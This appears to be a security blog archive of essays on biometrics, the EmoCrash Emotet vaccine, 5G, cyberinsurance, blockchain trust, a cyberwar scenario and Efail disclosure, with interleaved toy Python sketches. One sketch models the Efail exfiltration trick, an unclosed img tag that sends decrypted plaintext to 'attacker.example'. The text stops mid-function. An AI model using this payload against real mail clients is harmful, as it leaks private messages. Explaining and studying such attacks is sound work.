Yet Another Biometric: Bioacoustic Signatures

Sound waves through the body are unique enough to be a biometric:

“Modeling allowed us to infer what structures or material features of the human body actually differentiated people,” explains Joo Yong Sim, one of the ETRI researchers who conducted the study. “For example, we could see how the structure, size, and weight of the bones, as well as the stiffness of the joints, affect the bioacoustics spectrum.”

[…]

Notably, the researchers were concerned that the accuracy of this approach could diminish with time, since the human body constantly changes its cells, matrices, and fluid content. To account for this, they acquired the acoustic data of participants at three separate intervals, each 30 days apart.

“We were very surprised that people’s bioacoustics spectral pattern maintained well over time, despite the concern that the pattern would change greatly,” says Sim. “These results suggest that the bioacoustics signature reflects more anatomical features than changes in water, body temperature, or biomolecule concentration in blood that change from day to day.”

It’s not great. Ninety-seven percent accuracy is worse than fingerprints and iris scans, and while the biometric held steady over a month of testing, it almost certainly changes as we age, gain and lose weight, and so on. Still, interesting.
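
As a toy illustration of how a spectral biometric like this might be matched (my sketch, not the ETRI team’s actual method): represent each person’s bioacoustic frequency response as a vector and identify a probe measurement by similarity against enrolled templates. The templates, threshold, and four-bin spectra below are all invented for illustration.

```python
import math

def cosine_similarity(a, b):
    # Cosine of the angle between two spectra; 1.0 means identical shape.
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb)

def identify(probe, enrolled, threshold=0.95):
    # Return the enrolled identity whose spectrum best matches the probe,
    # or None if no match clears the threshold.
    best_id, best_score = None, threshold
    for person, template in enrolled.items():
        score = cosine_similarity(probe, template)
        if score > best_score:
            best_id, best_score = person, score
    return best_id

# Hypothetical enrolled templates: per-person frequency-response magnitudes.
enrolled = {
    "alice": [0.9, 0.4, 0.2, 0.7],
    "bob":   [0.1, 0.8, 0.6, 0.3],
}
probe = [0.88, 0.41, 0.22, 0.69]   # "alice," measured 30 days later
print(identify(probe, enrolled))   # alice
```

The interesting empirical claim in the study is precisely that a probe taken 30 days later still clears the threshold; the anatomy-driven shape of the spectrum dominates day-to-day physiological noise.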

EDITED TO ADD: This post has been translated into Spanish.

Posted on August 21, 2020 at 6:03 AM | 13 Comments

Vaccine for Emotet Malware

Interesting story of a vaccine for the Emotet malware:

Through trial and error and thanks to subsequent Emotet updates that refined how the new persistence mechanism worked, Quinn was able to put together a tiny PowerShell script that exploited the registry key mechanism to crash Emotet itself.

The script, cleverly named EmoCrash, effectively scanned a user’s computer and generated a correct—but malformed—Emotet registry key.

When Quinn tried to purposely infect a clean computer with Emotet, the malformed registry key triggered a buffer overflow in Emotet’s code and crashed the malware, effectively preventing users from getting infected.

When Quinn ran EmoCrash on computers already infected with Emotet, the script would replace the good registry key with the malformed one, and when Emotet would re-check the registry key, the malware would crash as well, preventing infected hosts from communicating with the Emotet command-and-control server.

[…]

The Binary Defense team quickly realized that news about this discovery needed to be kept under complete secrecy, to prevent the Emotet gang from fixing its code, but they understood EmoCrash also needed to make its way into the hands of companies across the world.

Compared to many of today’s major cybersecurity firms, all of which have decades of history behind them, Binary Defense was founded in 2014, and despite being one of the industry’s up-and-comers, it doesn’t yet have the influence and connections to get this done without news of its discovery leaking, either by accident or because of a jealous rival.

To get this done, Binary Defense worked with Team CYMRU, a company that has a decades-long history of organizing and participating in botnet takedowns.

Working behind the scenes, Team CYMRU made sure that EmoCrash made its way into the hands of national Computer Emergency Response Teams (CERTs), which then spread it to the companies in their respective jurisdictions.

According to James Shank, Chief Architect for Team CYMRU, the company has contacts with more than 125 national and regional CERT teams, and also manages a mailing list through which it distributes sensitive information to more than 6,000 members. Furthermore, Team CYMRU also runs a biweekly group dedicated to dealing with Emotet’s latest shenanigans.

This broad and well-orchestrated effort has helped EmoCrash make its way around the globe over the course of the past six months.

[…]

Either by accident or by figuring out there was something wrong in its persistence mechanism, the Emotet gang did, eventually, change its entire persistence mechanism on Aug. 6—exactly six months after Quinn made his initial discovery.

EmoCrash may not be useful to anyone anymore, but for six months, this tiny PowerShell script helped organizations stay ahead of malware operations—a truly rare sight in today’s cyber-security field.
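
The excerpt doesn’t publish EmoCrash’s internals, so the following is only a toy simulation of the general “vaccine” idea: pre-plant data that a buggy parser will later choke on. The registry layout, key name, buffer size, and config value are all invented for illustration; the real script worked against Emotet’s actual registry-based persistence mechanism.

```python
# Toy simulation of a malware "vaccine": the defender pre-plants a value
# the malware will later parse, crafted to trip a bug in its own parser.
# Everything here (key name, buffer size, config format) is hypothetical.

KEY = r"HKCU\Software\Example\PersistenceValue"

def malware_read_config(registry):
    """Simulated malware persistence check with a fixed-size-buffer bug."""
    value = registry.get(KEY)
    if value is None:
        value = "cfg-v1"                 # malware writes its own short key
        registry[KEY] = value
    buffer = bytearray(32)               # the "buffer" the malware copies into
    data = value.encode()
    if len(data) > len(buffer):          # the real bug is a missing length
        raise OverflowError("crash")     # check; here we just model the crash
    buffer[: len(data)] = data
    return buffer

def vaccinate(registry):
    # Pre-plant a well-formed but oversized value: harmless to the system,
    # fatal to the buggy parser that later tries to copy it.
    registry[KEY] = "X" * 64

fake_registry = {}                       # stand-in for the Windows registry
vaccinate(fake_registry)
try:
    malware_read_config(fake_registry)
except OverflowError:
    print("malware crashed before installing")
```

The elegant part of the real EmoCrash is the same asymmetry this sketch shows: the planted key is inert for everyone except the one program with the parsing bug.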

Posted on August 18, 2020 at 6:03 AM | 17 Comments

5G Security

The security risks inherent in Chinese-made 5G networking equipment are easy to understand. Because the companies that make the equipment are subservient to the Chinese government, they could be forced to include backdoors in the hardware or software to give Beijing remote access. Eavesdropping is also a risk, although efforts to listen in would almost certainly be detectable. More insidious is the possibility that Beijing could use its access to degrade or disrupt communications services in the event of a larger geopolitical conflict. Since the internet, especially the “internet of things,” is expected to rely heavily on 5G infrastructure, potential Chinese infiltration is a serious national security threat.

But keeping untrusted companies like Huawei out of Western infrastructure isn’t enough to secure 5G. Neither is banning Chinese microchips, software, or programmers. Security vulnerabilities in the standards—­the protocols and software for 5G—­ensure that vulnerabilities will remain, regardless of who provides the hardware and software. These insecurities are a result of market forces that prioritize costs over security and of governments, including the United States, that want to preserve the option of surveillance in 5G networks. If the United States is serious about tackling the national security threats related to an insecure 5G network, it needs to rethink the extent to which it values corporate profits and government espionage over security.

To be sure, there are significant security improvements in 5G over 4G: in encryption, authentication, integrity protection, privacy, and network availability. But the enhancements aren’t enough.

The 5G security problems are threefold. First, the standards are simply too complex to implement securely. This is true for all software, but the 5G protocols offer particular difficulties. Because of how it is designed, the system blurs the wireless portion of the network connecting phones with base stations and the core portion that routes data around the world. Additionally, much of the network is virtualized, meaning that it will rely on software running on dynamically configurable hardware. This design dramatically increases the points vulnerable to attack, as does the expected massive increase in both things connected to the network and the data flying about it.

Second, there’s so much backward compatibility built into the 5G network that older vulnerabilities remain. 5G is an evolution of the decade-old 4G network, and most networks will mix generations. Without the ability to do a clean break from 4G to 5G, it will simply be impossible to improve security in some areas. Attackers may be able to force 5G systems to use more vulnerable 4G protocols, for example, and 5G networks will inherit many existing problems.
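
The downgrade risk can be illustrated with a toy negotiation. The generation names and numeric “security levels” below are schematic, not real 3GPP signaling; the point is only that an unauthenticated offer lets an attacker pick the weakest protocol the client still supports.

```python
# Illustrative downgrade attack: a client that accepts whatever generation
# the network offers inherits the weakest protocol an attacker can force.

SUPPORTED = {"5G": 3, "4G": 2, "2G": 1}   # higher = stronger protections

def negotiate(client_prefs, network_offer):
    """Pick the best generation both sides support (naive, unauthenticated)."""
    common = [g for g in client_prefs if g in network_offer]
    return max(common, key=SUPPORTED.get) if common else None

client = ["5G", "4G", "2G"]               # backward compatibility kept on

honest_network = ["5G", "4G"]
print(negotiate(client, honest_network))  # 5G

# A fake base station simply withholds the stronger options; because the
# offer itself isn't authenticated, the client can't tell the difference.
rogue_offer = ["2G"]
print(negotiate(client, rogue_offer))     # 2G
```

Stripping old generations from the client closes the hole, which is exactly why backward compatibility and security pull in opposite directions here.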

Third, the 5G standards committees missed many opportunities to improve security. Many of the new security features in 5G are optional, and network operators can choose not to implement them. The same happened with 4G; operators even ignored security features defined as mandatory in the standard because implementing them was expensive. But even worse, for 5G, development, performance, cost, and time to market were all prioritized over security, which was treated as an afterthought.

Already problems are being discovered. In November 2019, researchers published vulnerabilities that allow 5G users to be tracked in real time, be sent fake emergency alerts, or be disconnected from the 5G network altogether. And this wasn’t the first reporting to find issues in 5G protocols and implementations.

Chinese, Iranians, North Koreans, and Russians have been breaking into U.S. networks for years without having any control over the hardware, the software, or the companies that produce the devices. (And the U.S. National Security Agency, or NSA, has been breaking into foreign networks for years without having to coerce companies into deliberately adding backdoors.) Nothing in 5G prevents these activities from continuing, even increasing, in the future.

Solutions are few and far between and not very satisfying. It’s really too late to secure 5G networks. Susan Gordon, then-U.S. principal deputy director of national intelligence, had it right when she said last March: “You have to presume a dirty network.” Indeed, the United States needs to accept 5G’s insecurities and build secure systems on top of it. In some cases, doing so isn’t hard: Adding encryption to an iPhone or a messaging system like WhatsApp provides security from eavesdropping, and distributed protocols provide security from disruption­—regardless of how insecure the network they operate on is. In other cases, it’s impossible. If your smartphone is vulnerable to a downloaded exploit, it doesn’t matter how secure the networking protocols are. Often, the task will be somewhere in between these two extremes.
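
The “secure systems on top of a dirty network” approach can be sketched with nothing but the standard library: endpoints that share a key can detect in-network tampering even if every router between them is hostile. A real design would also encrypt; this minimal sketch shows integrity only, and the shared key and messages are hypothetical.

```python
import hmac
import hashlib

# Endpoint-level protection layered over an untrusted ("dirty") network:
# the network can drop messages, but it cannot forge or silently alter them.

KEY = b"shared-secret-established-out-of-band"

def send(message: bytes):
    # Compute an authentication tag; both message and tag cross the network.
    tag = hmac.new(KEY, message, hashlib.sha256).digest()
    return message, tag

def receive(message: bytes, tag: bytes) -> bytes:
    # Recompute the tag and compare in constant time.
    expected = hmac.new(KEY, message, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("message was altered in transit")
    return message

msg, tag = send(b"status report: all clear")
print(receive(msg, tag))                     # delivered intact

tampered = b"status report: all COMPROMISED"  # in-network modification
try:
    receive(tampered, tag)
except ValueError as err:
    print(err)                               # tampering detected
```

This is the WhatsApp/iPhone point in miniature: the security property lives at the endpoints, so it holds regardless of how compromised the 5G network underneath is.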

5G security is just one of the many areas in which near-term corporate profits prevailed against broader social good. In a capitalist free market economy, the only solution is to regulate companies, and the United States has not shown any serious appetite for that.

What’s more, U.S. intelligence agencies like the NSA rely on inadvertent insecurities for their worldwide data collection efforts, and law enforcement agencies like the FBI have even tried to introduce new ones to make their own data collection efforts easier. Again, near-term self-interest has so far triumphed over society’s long-term best interests.

In turn, rather than mustering a major effort to fix 5G, what’s most likely to happen is that the United States will muddle along with the problems the network has, as it has done for decades. Maybe things will be different with 6G, which is starting to be discussed in technical standards committees. The U.S. House of Representatives just passed a bill directing the State Department to participate in the international standards-setting process so that it is not just run by telecommunications operators and more interested countries, but there is no chance of that measure becoming law.

The geopolitics of 5G are complicated, involving a lot more than security. China is subsidizing the purchase of its companies’ networking equipment in countries around the world. The technology will quickly become critical national infrastructure, and security problems will become life-threatening. Both criminal attacks and government cyber-operations will become more common and more damaging. Eventually, Washington will have to do something. That something will be difficult and expensive—­let’s hope it won’t also be too late.

This essay previously appeared in Foreign Policy.

EDITED TO ADD (1/16): Slashdot thread.

EDITED TO ADD (3/16): This essay has been translated into Spanish.

EDITED TO ADD: This essay has been translated into Portuguese.

Posted on January 14, 2020 at 7:42 AM | 30 Comments

Cyberinsurance and Acts of War

I had not heard about this case before. Zurich Insurance has refused to pay Mondelez International’s claim of $100 million in damages from NotPetya. Zurich claims the attack was an act of war and therefore not covered. Mondelez is suing.

Those turning to cyber insurance to manage their exposure presently face significant uncertainties about its promise. First, the scope of cyber risks vastly exceeds available coverage, as cyber perils cut across most areas of commercial insurance in an unprecedented manner: direct losses to policyholders and third-party claims (clients, customers, etc.); financial, physical and IP damages; business interruption, and so on. Yet no cyber insurance policies cover this entire spectrum. Second, the scope of cyber-risk coverage under existing policies, whether traditional general liability or property policies or cyber-specific policies, is rarely comprehensive (to cover all possible cyber perils) and often unclear (i.e., it does not explicitly pertain to all manifestations of cyber perils, or it explicitly excludes some).

But it is in the public interest for Zurich and its peers to expand their role in managing cyber risk. In its ideal state, a mature cyber insurance market could go beyond simply absorbing some of the damage of cyberattacks and play a more fundamental role in engineering and managing cyber risk. It would allow analysis of data across industries to understand risk factors and develop common metrics and scalable solutions. It would allow researchers to pinpoint sources of aggregation risk, such as weak spots in widely relied-upon software and hardware platforms and services. Through its financial levers, the insurance industry can turn these insights into action, shaping private-sector behavior and promoting best practices internationally. Such systematic efforts to improve and incentivize cyber-risk management would redress the conditions that made NotPetya possible in the first place. This, in turn, would diminish the onus on governments to retaliate against attacks.

Posted on February 13, 2019 at 6:32 AM | 27 Comments

Blockchain and Trust

In his 2008 white paper that first proposed bitcoin, the anonymous Satoshi Nakamoto concluded with: “We have proposed a system for electronic transactions without relying on trust.” He was referring to blockchain, the system behind bitcoin cryptocurrency. The circumvention of trust is a great promise, but it’s just not true. Yes, bitcoin eliminates certain trusted intermediaries that are inherent in other payment systems like credit cards. But you still have to trust bitcoin—and everything about it.

Much has been written about blockchains and how they displace, reshape, or eliminate trust. But when you analyze both blockchain and trust, you quickly realize that there is much more hype than value. Blockchain solutions are often much worse than what they replace.

First, a caveat. By blockchain, I mean something very specific: the data structures and protocols that make up a public blockchain. These have three essential elements. The first is a distributed (as in multiple copies) but centralized (as in there’s only one) ledger, which is a way of recording what happened and in what order. This ledger is public, meaning that anyone can read it, and immutable, meaning that no one can change what happened in the past.

The second element is the consensus algorithm, which is a way to ensure all the copies of the ledger are the same. This is generally called mining; a critical part of the system is that anyone can participate. It is also distributed, meaning that you don’t have to trust any particular node in the consensus network. It can also be extremely expensive, both in data storage and in the energy required to maintain it. Bitcoin has the most expensive consensus algorithm the world has ever seen, by far.

Finally, the third element is the currency. This is some sort of digital token that has value and is publicly traded. Currency is a necessary element of a blockchain to align the incentives of everyone involved. Transactions involving these tokens are stored on the ledger.
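
As a rough illustration of the first two elements, here is a minimal hash-chained ledger with a toy proof-of-work. It is a sketch of the general construction, not Bitcoin’s actual block format; the difficulty is deliberately trivial, whereas Bitcoin’s is what makes its consensus so expensive.

```python
import hashlib
import json

def block_hash(block):
    # Hash the block's contents; changing any past data changes every
    # subsequent hash, which is what makes the ledger tamper-evident.
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def mine(prev_hash, transactions, difficulty=2):
    # Toy proof of work: find a nonce so the hash starts with `difficulty`
    # zero hex digits. Real difficulty is vastly higher, hence the cost.
    nonce = 0
    while True:
        block = {"prev": prev_hash, "txs": transactions, "nonce": nonce}
        h = block_hash(block)
        if h.startswith("0" * difficulty):
            return block, h
        nonce += 1

def verify_chain(chain):
    # Anyone can re-check the whole history without trusting the miner.
    prev = "genesis"
    for block, h in chain:
        if block["prev"] != prev or block_hash(block) != h:
            return False
        prev = h
    return True

chain = []
b1, h1 = mine("genesis", ["alice pays bob 5"])
chain.append((b1, h1))
b2, h2 = mine(h1, ["bob pays carol 2"])
chain.append((b2, h2))
print(verify_chain(chain))             # True

b1["txs"] = ["alice pays mallory 5"]   # try to rewrite history...
print(verify_chain(chain))             # False: the hashes no longer match
```

Note what the sketch does and doesn’t give you: anyone can verify the chain, but nothing in the code tells you which chain to trust when two miners disagree. That choice is where the economics, and the trust, come back in.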

Private blockchains are completely uninteresting. (By this, I mean systems that use the blockchain data structure but don’t have the above three elements.) In general, they have some external limitation on who can interact with the blockchain and its features. These are not anything new; they’re distributed append-only data structures with a list of individuals authorized to add to it. Consensus protocols have been studied in distributed systems for more than 60 years. Append-only data structures have been similarly well covered. They’re blockchains in name only, and—as far as I can tell—the only reason to operate one is to ride on the blockchain hype.

All three elements of a public blockchain fit together as a single network that offers new security properties. The question is: Is it actually good for anything? It’s all a matter of trust.

Trust is essential to society. As a species, humans are wired to trust one another. Society can’t function without trust, and the fact that we mostly don’t even think about it is a measure of how well trust works.

The word “trust” is loaded with many meanings. There’s personal and intimate trust. When we say we trust a friend, we mean that we trust their intentions and know that those intentions will inform their actions. There’s also the less intimate, less personal trust—we might not know someone personally, or know their motivations, but we can trust their future actions. Blockchain enables this sort of trust: We don’t know any bitcoin miners, for example, but we trust that they will follow the mining protocol and make the whole system work.

Most blockchain enthusiasts have an unnaturally narrow definition of trust. They’re fond of catchphrases like “in code we trust,” “in math we trust,” and “in crypto we trust.” This is trust as verification. But verification isn’t the same as trust.

In 2012, I wrote a book about trust and security, Liars and Outliers. In it, I listed four very general systems our species uses to incentivize trustworthy behavior. The first two are morals and reputation. The problem is that they scale only to a certain population size. Primitive systems were good enough for small communities, but larger communities required delegation, and more formalism.

The third is institutions. Institutions have rules and laws that induce people to behave according to the group norm, imposing sanctions on those who do not. In a sense, laws formalize reputation. Finally, the fourth is security systems. These are the wide varieties of security technologies we employ: door locks and tall fences, alarm systems and guards, forensics and audit systems, and so on.

These four elements work together to enable trust. Take banking, for example. Financial institutions, merchants, and individuals are all concerned with their reputations, which prevents theft and fraud. The laws and regulations surrounding every aspect of banking keep everyone in line, including backstops that limit risks in the case of fraud. And there are lots of security systems in place, from anti-counterfeiting technologies to internet-security technologies.

In his 2018 book, Blockchain and the New Architecture of Trust, Kevin Werbach outlines four different “trust architectures.” The first is peer-to-peer trust. This basically corresponds to my morals and reputational systems: pairs of people who come to trust each other. His second is leviathan trust, which corresponds to institutional trust. You can see this working in our system of contracts, which allows parties that don’t trust each other to enter into an agreement because they both trust that a government system will help resolve disputes. His third is intermediary trust. A good example is the credit card system, which allows untrusting buyers and sellers to engage in commerce. His fourth trust architecture is distributed trust. This is emergent trust in the particular security system that is blockchain.

What blockchain does is shift some of the trust in people and institutions to trust in technology. You need to trust the cryptography, the protocols, the software, the computers and the network. And you need to trust them absolutely, because they’re often single points of failure.

When that trust turns out to be misplaced, there is no recourse. If your bitcoin exchange gets hacked, you lose all of your money. If your bitcoin wallet gets hacked, you lose all of your money. If you forget your login credentials, you lose all of your money. If there’s a bug in the code of your smart contract, you lose all of your money. If someone successfully hacks the blockchain security, you lose all of your money. In many ways, trusting technology is harder than trusting people. Would you rather trust a human legal system or the details of some computer code you don’t have the expertise to audit?

Blockchain enthusiasts point to more traditional forms of trust—bank processing fees, for example—as expensive. But blockchain trust is also costly; the cost is just hidden. For bitcoin, that’s the cost of the additional bitcoin mined, the transaction fees, and the enormous environmental waste.

Blockchain doesn’t eliminate the need to trust human institutions. There will always be a big gap that can’t be addressed by technology alone. People still need to be in charge, and there is always a need for governance outside the system. This is obvious in the ongoing debate about changing the bitcoin block size, or in fixing the DAO attack against Ethereum. There’s always a need to override the rules, and there’s always a need for the ability to make permanent rules changes. As long as hard forks are a possibility—that’s when the people in charge of a blockchain step outside the system to change it—people will need to be in charge.

Any blockchain system will have to coexist with other, more conventional systems. Modern banking, for example, is designed to be reversible. Bitcoin is not. That makes it hard to make the two compatible, and the result is often an insecurity. Steve Wozniak was scammed out of $70K in bitcoin because he forgot this.

Blockchain technology is often centralized. Bitcoin might theoretically be based on distributed trust, but in practice, that’s just not true. Just about everyone using bitcoin has to trust one of the few available wallets and use one of the few available exchanges. People have to trust the software and the operating systems and the computers everything is running on. And we’ve seen attacks against wallets and exchanges. We’ve seen Trojans and phishing and password guessing. Criminals have even used flaws in the system that people use to repair their cell phones to steal bitcoin.

Moreover, in any distributed trust system, there are backdoor methods for centralization to creep back in. With bitcoin, there are only a few miners of consequence. There’s one company that provides most of the mining hardware. There are only a few dominant exchanges. To the extent that most people interact with bitcoin, it is through these centralized systems. This also allows for attacks against blockchain-based systems.

These issues are not bugs in current blockchain applications, they’re inherent in how blockchain works. Any evaluation of the security of the system has to take the whole socio-technical system into account. Too many blockchain enthusiasts focus on the technology and ignore the rest.

To the extent that people don’t use bitcoin, it’s because they don’t trust bitcoin. That has nothing to do with the cryptography or the protocols. In fact, a system where you can lose your life savings if you forget your key or download a piece of malware is not particularly trustworthy. No amount of explaining how SHA-256 works to prevent double-spending will fix that.

Similarly, to the extent that people do use blockchains, it is because they trust them. People either own bitcoin or not based on reputation; that’s true even for speculators who own bitcoin simply because they think it will make them rich quickly. People choose a wallet for their cryptocurrency, and an exchange for their transactions, based on reputation. We even evaluate and trust the cryptography that underpins blockchains based on the algorithms’ reputation.

To see how this can fail, look at the various supply-chain security systems that are using blockchain. A blockchain isn’t a necessary feature of any of them. The reason they’re successful is that everyone has a single software platform to enter their data into. Even though the blockchain systems are built on distributed trust, people don’t necessarily accept that. For example, some companies don’t trust the IBM/Maersk system because it’s not their blockchain.

Irrational? Maybe, but that’s how trust works. It can’t be replaced by algorithms and protocols. It’s much more social than that.

Still, the idea that blockchains can somehow eliminate the need for trust persists. Recently, I received an email from a company that implemented secure messaging using blockchain. It said, in part: “Using the blockchain, as we have done, has eliminated the need for Trust.” This sentiment suggests the writer misunderstands both what blockchain does and how trust works.

Do you need a public blockchain? The answer is almost certainly no. A blockchain probably doesn’t solve the security problems you think it solves. The security problems it solves are probably not the ones you have. (Manipulating audit data is probably not your major security risk.) A false trust in blockchain can itself be a security risk. The inefficiencies, especially in scaling, are probably not worth it. I have looked at many blockchain applications, and all of them could achieve the same security properties without using a blockchain­—of course, then they wouldn’t have the cool name.

Honestly, cryptocurrencies are useless. They’re only used by speculators looking for quick riches, people who don’t like government-backed currencies, and criminals who want a black-market way to exchange money.

To answer the question of whether the blockchain is needed, ask yourself: Does the blockchain change the system of trust in any meaningful way, or just shift it around? Does it just try to replace trust with verification? Does it strengthen existing trust relationships, or try to go against them? How can trust be abused in the new system, and is this better or worse than the potential abuses in the old system? And lastly: What would your system look like if you didn’t use blockchain at all?

If you ask yourself those questions, it’s likely you’ll choose solutions that don’t use public blockchain. And that’ll be a good thing—especially when the hype dissipates.

This essay previously appeared on Wired.com.

EDITED TO ADD (2/11): Two commentaries on my essay.

I have wanted to write this essay for over a year. The impetus to finally do it came from an invite to speak at the Hyperledger Global Forum in December. This essay is a version of the talk I wrote for that event, made more accessible to a general audience.

It seems to be the season for blockchain takedowns. James Waldo has an excellent essay in Queue. And Nicholas Weaver gave a talk at the Enigma Conference, summarized here. It’s a shortened version of this talk.

EDITED TO ADD (2/17): Reddit thread.

EDITED TO ADD (3/1): Two more articles.

EDITED TO ADD (7/14/2023): This essay has been translated into Italian.

Posted on February 12, 2019 at 6:25 AM | 154 Comments

Future Cyberwar

A report for the Center for Strategic and International Studies looks at surprise and war. One of the report’s cyberwar scenarios is particularly compelling. It doesn’t just map cyber onto today’s tactics, but completely reimagines future tactics that include a cyber component (quote starts on page 110).

The U.S. secretary of defense had wondered this past week when the other shoe would drop. Finally, it had, though the U.S. military would be unable to respond effectively for a while.

The scope and detail of the attack, not to mention its sheer audacity, had earned the grudging respect of the secretary. Years of worry about a possible Chinese “Assassin’s Mace”—a silver bullet super-weapon capable of disabling key parts of the American military—turned out to be focused on the wrong thing.

The cyber attacks varied. Sailors stationed at the 7th Fleet’s homeport in Japan awoke one day to find their financial accounts, and those of their dependents, empty. Checking, savings, retirement funds: simply gone. The Marines based on Okinawa were under virtual siege by the populace, whose simmering resentment at their presence had boiled over after a YouTube video posted under the account of a Marine stationed there had gone viral. The video featured a dozen Marines drunkenly gang-raping two teenaged Okinawan girls. The video was vivid, the girls’ cries heart-wrenching, the cheers of the Marines sickening. And all of it fake. The National Security Agency’s initial analysis of the video had uncovered digital fingerprints showing that it was a computer-assisted lie, and could prove that the Marine’s account under which it had been posted was hacked. But the damage had been done.

There was the commanding officer of Edwards Air Force Base whose Internet browser history had been posted on the squadron’s Facebook page. His command turned on him as a pervert; his weak protestations that he had not visited most of the posted links could not counter his admission that he had, in fact, trafficked some of them. Lies mixed with the truth. Soldiers at Fort Sill were at each other’s throats thanks to a series of text messages that allegedly unearthed an adultery ring on base.

The variations elsewhere were endless. Marines suddenly owed hundreds of thousands of dollars on credit lines they had never opened; sailors received death threats on their Twitter feeds; spouses and female service members had private pictures of themselves plastered across the Internet; older service members received notifications about cancerous conditions discovered in their latest physical.

Leadership was not exempt. Under the hashtag #PACOMMUSTGO a dozen women allegedly described harassment by the commander of Pacific command. Editorial writers demanded that, under the administration’s “zero tolerance” policy, he step aside while Congress held hearings.

There was not an American service member or dependent whose life had not been digitally turned upside down. In response, the secretary had declared “an operational pause,” directing units to stand down until things were sorted out.

Then, China had made its move, flooding the South China Sea with its conventional forces, enforcing a sea and air identification zone there, and blockading Taiwan. But the secretary could only respond weakly with a few air patrols and diversions of ships already at sea. Word was coming in through back channels that the Taiwanese government, suddenly stripped of its most ardent defender, was already considering capitulation.

I found this excerpt here. The author is Mark Cancian.

Posted on August 27, 2018 at 6:16 AM | 53 Comments

E-Mail Vulnerabilities and Disclosure

Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.
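
The class of attack can be modeled in a few lines. In the “direct exfiltration” variant, the attacker wraps the untouched ciphertext in an unclosed HTML image tag; after decryption, the client’s HTML engine sees the plaintext inside a URL and tries to fetch it. The decryption stand-in and attacker domain below are invented for illustration; real Efail targets OpenPGP and S/MIME parts.

```python
# Simplified model of Efail-style direct exfiltration. The "ENC[...]"
# wrapper is a stand-in for an encrypted MIME part; decrypt() stands in
# for the client's OpenPGP/S-MIME decryption of that part.

def decrypt(ciphertext: str) -> str:
    return ciphertext.removeprefix("ENC[").removesuffix("]")

def render_multipart(parts):
    # Vulnerable clients decrypted each part, then concatenated all parts
    # into one HTML document before rendering it.
    return "".join(decrypt(p) if p.startswith("ENC[") else p for p in parts)

# The attacker alters the stored message: plain HTML is added before and
# after the encrypted part, which itself is left untouched.
altered_message = [
    '<img src="http://attacker.example/collect?d=',   # unclosed tag
    "ENC[the secret plaintext]",
    '">',
]

html = render_multipart(altered_message)
print(html)
# The HTML engine now sees the decrypted plaintext inside the image URL
# and would request it from attacker.example, leaking the secret.
```

This is why the mitigations below center on HTML: disabling remote content or HTML rendering breaks the exfiltration channel even when the decryption path is still vulnerable.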

But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they’ve fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it’s fixed. Or, if you know how to do it, turn off your e-mail client’s ability to process HTML e-mail or—even better—stop decrypting e-mails from within the client. There’s even more complex advice for more sophisticated users, but if you’re one of those, you don’t need me to explain this to you.

Consider your encrypted e-mail insecure until this is fixed.

All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It’s a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug-bounties paid by some vendors.

Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.

Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names—the e-mail vulnerability is called “Efail“—websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.

This simultaneous announcement is best for security. While it’s always possible that some organization—either government or criminal—has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.

Things get much more complicated when multiple vendors are involved. In this case, Efail isn’t a vulnerability in a particular product; it’s a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that’s close to impossible.

Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn’t leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser—honestly, a really bad idea—which resulted in details leaking.

After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published—and lots of press followed.

All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or—even more problematic—communities without clear ownership. And that’s what we have with OpenPGP. It’s even worse when the bug involves the interaction between different parts of a system. In this case, there’s nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn’t its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.

Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use—our phones and computers—to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won’t be. Sometimes it’ll be two secure systems that, when they interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don’t even know who to blame for that one.
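That Google/Netflix mismatch is worth a small illustration. Gmail treats dotted variants of an address’s local part as one mailbox, while a service that keys accounts on the raw string sees two different users. The sketch below is illustrative only; the addresses are made up, and the normalization shown is a simplification of Gmail’s actual rules:

```python
# Two systems, two different assumptions about what makes addresses "equal".
def gmail_canonical(addr):
    # Gmail ignores dots and anything after "+" in the local part;
    # many other services instead key accounts on the raw string.
    local, domain = addr.lower().split("@")
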